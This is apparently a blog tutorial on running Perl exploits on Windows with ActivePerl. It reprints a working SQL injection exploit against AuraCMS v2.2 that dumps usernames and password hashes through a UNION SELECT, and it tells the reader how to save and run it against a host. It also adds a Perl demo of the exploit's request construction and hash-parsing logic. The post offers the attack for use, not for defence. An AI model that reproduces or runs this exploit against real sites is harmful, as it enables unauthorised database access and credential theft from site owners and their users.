Compile an Exploit with ActivePerl

Sometimes when browsing milw0rm we find an exploit written in Perl, but it is not obvious how to run it on a Windows machine. To clear that up, I will share how these exploits are used. We need a Perl interpreter for Windows called ActivePerl; search Google to get it. It also appears to be on the yogyafree software CD.
After ActivePerl is installed, the next step is to find the exploit we want to use. As an example we use this one:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;

#
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.auracms.org
# [!] Detected...: 19.01.2008
# [!] Reported...: 25.01.2008
# [!] Response...: 30.01.2008
#
# [!] Background.: AuraCMS is a CMS based on PHP and SQL
#
# [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173
#
# 173: case 'detail':
# 174: if (isset($_GET['id'])){
# 175: $id = $_GET['id'];
# 176: $albums = $_GET['albums'];
#
# 200: $query = mysql_query ("SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage");
#
# [!] Solution...: Install gallery update!
#

# Usage banner: shown when host and path are missing.
if(!$ARGV[1])
{
print "\n   \\#'#/  ";
print "\n   (-.-)  ";
print "\n-------------------oOO---(_)---OOo--------------------";
print "\n| AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |";
print "\n| (works only with magic quotes = off)                  |";
print "\n| coded by DNX                                          |";
print "\n--------------------------------------------------------";
print "\n[!] Usage......: perl aura.pl [Host] [Path] ";
print "\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/";
print "\n[!] Options....:";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my %options = ();
GetOptions(\%options, "p=s");

print "[!] Exploiting...\n";

exploit();

print "\n[!] Exploit done\n";

sub exploit
{
my $url1 = "http://".$host.$path."index.php?pilih=gallery&mod=yes";
my $url2 = "http://".$host.$path."mod/gallery/ajax/gallery_data.php";
my $ua = LWP::UserAgent->new;
my $cookie = HTTP::Cookies->new();
# $1 = first quoted value before "name" (the user column),
# $3 = the last 32-hex-character run in the chunk (the MD5 password hash)
my $regexp = ":\"(.*?)\",\"name\"(.*)([a-fA-F0-9]{32})";
my $res = "";
my $content = "";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

###############
# exist file? #
###############
$res = $ua->get($url2);
if(!$res->is_success)
{
die("[!] Failed, file not found\n");
}

##########################
# get cookie from server #
##########################
$res = $ua->get($url1);
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);
$ua->get($url2);
$res = $ua->get($url2);

######################
# check magic quotes #
######################
# With magic_quotes_gpc on, PHP escapes the injected ' as \' and the
# JSON output doubles the backslash, so the body contains "albums":["\\'"].
$url2 .= "?action=detail&id=&image=&albums='";
$res = $ua->get($url2);
$content = $res->content;

if($content =~ /,\"albums\":\[\"\\\\'\"],/)
{
die("[!] Failed, magic quotes on\n")
}

##############
# get hashes #
##############
# UNION SELECT puts user and password into the gallery row columns.
$url2 .= "%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*";
$res = $ua->get($url2);
$content = $res->content;

my @cont = split(/\{\"files\"/, $content);
foreach (@cont)
{
if($_ =~ /$regexp/)
{
print "$1 $3\n";
}
}
}

# milw0rm.com [2008-02-12]

This exploit targets websites running AuraCMS v2.2. It abuses the $_GET['albums'] parameter in gallery_data.php, which is concatenated straight into a MySQL query without sanitisation, to perform a remote SQL injection: a UNION SELECT that pulls usernames and password hashes out of the useraura table. Note the exploit's own caveat: it only works when PHP's magic quotes are off, because magic quotes would escape the injected single quote, and the script checks for that before sending the UNION payload.
To use it, after installing ActivePerl, copy-paste the exploit above into Notepad and save it with the .pl extension, for example aura_gallerydata.pl. Then open a Command Prompt, change into the directory where the file is stored, and type perl aura_gallerydata.pl. Run without arguments it prints its usage; with a host and path (for example perl aura_gallerydata.pl 127.0.0.1 /auracms/) the exploit runs. Here I give a screenshot of this exploit in use.
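Before pointing the script at a live host, it helps to see what its parsing logic actually matches. The following is an added example (not part of the original post and not DNX's code): it reuses the exploit's URL construction, magic-quotes check and hash regex, but runs them offline against constructed responses. The host, path, and the JSON layout of the leaked row are assumptions for the demonstration, not captured output from AuraCMS.

```perl
#!/usr/bin/perl
# Added example, not part of the original post or the DNX exploit.
# Exercises the exploit's parsing logic offline against constructed
# responses, so you can see what the magic-quotes check and the hash
# regex match before running the real script against a host.
use strict;
use warnings;

# Same URL and payload construction as the exploit; host and path are
# assumed values for the demonstration.
sub build_request {
    my ($host, $path) = @_;
    my $base  = "http://" . $host . $path . "mod/gallery/ajax/gallery_data.php";
    my $probe = $base . "?action=detail&id=&image=&albums='";
    my $union = $probe . "%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*";
    return ($probe, $union);
}

# Magic quotes ON: PHP turns the injected ' into \' and the JSON output
# doubles the backslash, so the body contains "albums":["\\'"].
sub magic_quotes_on {
    my ($content) = @_;
    return $content =~ /,\"albums\":\[\"\\\\'\"],/ ? 1 : 0;
}

# Same split and regex as the exploit: per chunk, the first quoted value
# before "name" and the last run of 32 hex characters (an MD5 hash).
sub extract_hashes {
    my ($content) = @_;
    my $regexp = ":\"(.*?)\",\"name\"(.*)([a-fA-F0-9]{32})";
    my @found;
    for my $chunk (split(/\{\"files\"/, $content)) {
        if ($chunk =~ /$regexp/) {
            push @found, "$1 $3";
        }
    }
    return @found;
}

# Constructed responses (not captured from a real AuraCMS install).
my $mq_on = <<'JSON';
{"files":[],"albums":["\\'"],"name":""}
JSON
my $mq_off = <<'JSON';
{"files":[],"albums":["'"],"name":""}
JSON
# Assumed layout of a gallery row once the UNION SELECT lands the user
# and password columns in it.
my $leaked = <<'JSON';
{"files":[{"id":"admin","name":"2","desc":"5f4dcc3b5aa765d61d8327deb882cf99"}]}
JSON

my ($probe, $union) = build_request("127.0.0.1", "/auracms/");
print "[*] probe: $probe\n";
print "[*] union: $union\n";
print "[*] magic quotes on  -> ", magic_quotes_on($mq_on),  "\n";
print "[*] magic quotes off -> ", magic_quotes_on($mq_off), "\n";
print "[*] leaked: $_\n" for extract_hashes($leaked);
```

Run it with ActivePerl the same way as the exploit (perl parse_demo.pl from a Command Prompt). Two things become visible: the magic-quotes check keys on the doubled backslash in the JSON, so a target that escapes input any other way will slip past it, and the hash regex takes the first quoted value before "name" and the last 32-hex run in each chunk, so it reports at most one user and hash per "files" block.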


That is a simple trick from me; hopefully it is useful to all my friends.
